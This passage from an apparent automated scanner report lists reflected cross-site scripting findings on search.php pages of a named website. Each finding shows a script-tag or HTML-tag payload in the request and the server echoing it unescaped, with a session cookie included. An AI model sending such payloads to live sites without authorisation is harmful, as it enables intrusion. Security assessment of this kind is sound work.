<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes69ccd<script>alert(1)</script>f0bb5199292/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2514. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d2fb7<script>alert(1)</script>0832bcbea7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmosd2fb7<script>alert(1)</script>0832bcbea7/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmosd2fb7<script>alert(1)</script>0832bcbea7/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2515. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd34d<script>alert(1)</script>60dd9df8565 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/imagesfd34d<script>alert(1)</script>60dd9df8565/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/imagesfd34d<script>alert(1)</script>60dd9df8565/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2516. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 37f3b<script>alert(1)</script>98c4d08ab5e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating37f3b<script>alert(1)</script>98c4d08ab5e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating37f3b<script>alert(1)</script>98c4d08ab5e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2517. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 456f1<script>alert(1)</script>2bb3f0409e2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating/search.php456f1<script>alert(1)</script>2bb3f0409e2?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/search.php456f1<script>alert(1)</script>2bb3f0409e2?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2518. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 318d8<a>6ff1fb15625 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search318d8<a>6ff1fb15625&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search318d8<a>6ff1fb15625&opt=2 was not found on this server.</p>
...[SNIP]...

2.2519. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2b96a<a>97743e31a54 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/images/rating/search.php?keyword=search...2b96a<a>97743e31a54&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/search.php?keyword=search...2b96a<a>97743e31a54&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2520. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 760f3<script>alert(1)</script>b00bc1775cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&760f3<script>alert(1)</script>b00bc1775cf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&760f3<script>alert(1)</script>b00bc1775cf=1 was not found on this server.</p>
...[SNIP]...

2.2521. http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 29652<a>a566a5bf1b8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=229652<a>a566a5bf1b8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=229652<a>a566a5bf1b8 was not found on this server.</p>
...[SNIP]...

2.2522. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ff15<script>alert(1)</script>09641e5c697 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1ff15<script>alert(1)</script>09641e5c697/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1ff15<script>alert(1)</script>09641e5c697/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2523. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c8b3<script>alert(1)</script>73e62d3ff43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/372c8b3<script>alert(1)</script>73e62d3ff43/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/372c8b3<script>alert(1)</script>73e62d3ff43/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2524. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 48355<script>alert(1)</script>73d43b3f947 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes48355<script>alert(1)</script>73d43b3f947/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes48355<script>alert(1)</script>73d43b3f947/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2525. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dbcd0<script>alert(1)</script>bfd0acfd56a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmosdbcd0<script>alert(1)</script>bfd0acfd56a/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmosdbcd0<script>alert(1)</script>bfd0acfd56a/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2526. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 594ae<script>alert(1)</script>ae51c32dd60 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images594ae<script>alert(1)</script>ae51c32dd60/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images594ae<script>alert(1)</script>ae51c32dd60/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2527. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5f2a7<script>alert(1)</script>c3ae6b8d583 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/search.php5f2a7<script>alert(1)</script>c3ae6b8d583?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/search.php5f2a7<script>alert(1)</script>c3ae6b8d583?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2528. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a6753<a>9b5ea01f9ef was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Searcha6753<a>9b5ea01f9ef&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Searcha6753<a>9b5ea01f9ef&opt=2 was not found on this server.</p>
...[SNIP]...

2.2529. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ad24a<a>8fac13f03d9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/37/themes/kosmos/images/search.php?keyword=search...ad24a<a>8fac13f03d9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/search.php?keyword=search...ad24a<a>8fac13f03d9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2530. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a14e2<script>alert(1)</script>da99364b879 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&a14e2<script>alert(1)</script>da99364b879=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&a14e2<script>alert(1)</script>da99364b879=1 was not found on this server.</p>
...[SNIP]...

2.2531. http://www.resellerbase.com/detail/37/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ed741<a>6eb02ca4432 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

